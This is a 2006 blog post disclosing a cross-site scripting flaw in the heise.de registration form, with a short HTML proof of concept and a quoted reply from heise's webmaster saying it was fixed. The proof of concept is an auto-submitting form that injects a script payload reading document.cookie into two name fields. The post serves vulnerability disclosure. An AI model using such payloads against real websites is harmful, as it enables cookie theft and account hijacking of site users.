XSS on heise.de

morph3us.org

Quicksearch

Categories

Syndication

XML RSS 1.0 feed
XML RSS 2.0 feed
ATOM/XML ATOM 1.0 feed
XML RSS 2.0 Comments

Tagged entries

Top Referers

www.google.at (4)
www.google.de (4)
www.google.com (3)
forum.grauezelle.net (2)
search.msn.com (1)
www.google.bg (1)
www.google.ca (1)
www.google.ch (1)
www.google.com.vn (1)

XSS on heise.de

  (Tuesday, January 3. 2006)
heise.de - a German news site for, amongst others, security related topics - is vulnerable for XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:
<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26
Hallo Herr Waldegger,

vielen Dank für Ihren Hinweis. Aufgrund der Feiertage hat die Behebung leider etwas länger gedauert.

Mit freundlichen Grüßen
heise online
Webmaster
Posted by in Security at 06:33
Defined tags for this entry: , ,
Related entries by tags:
Why Windows is less secure than GNU/Linux
Welcome Vista - Goodbye Windows
Unaddressed DoS vulnerabilities in IE 6 SP2
How-to fake heise news entries
Why Ad-Aware sucks as hell..
Dotless IP addresses and URL Obfuscation
BuHa ExploitMe Contest
Really great ideas..
Gmail Account Hijacking Vulnerability
MS05-053 - 896424
Comment (1) | Trackbacks (0)

Trackbacks
Trackback specific URI for this entry

No Trackbacks

Comments
Display comments as (Linear | Threaded)

[...] I already mentioned in a previous blog posting titled XSS on heise.de there was a XSS vulnerability on heise.de. I informed heise's webmaster about this bug on [...]
#1 Beat me, break me. - Blog Archive &raquo; How-to fake heise news entries (Homepage) on 2007-02-16 16:24 (Reply)

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

BBCode format allowed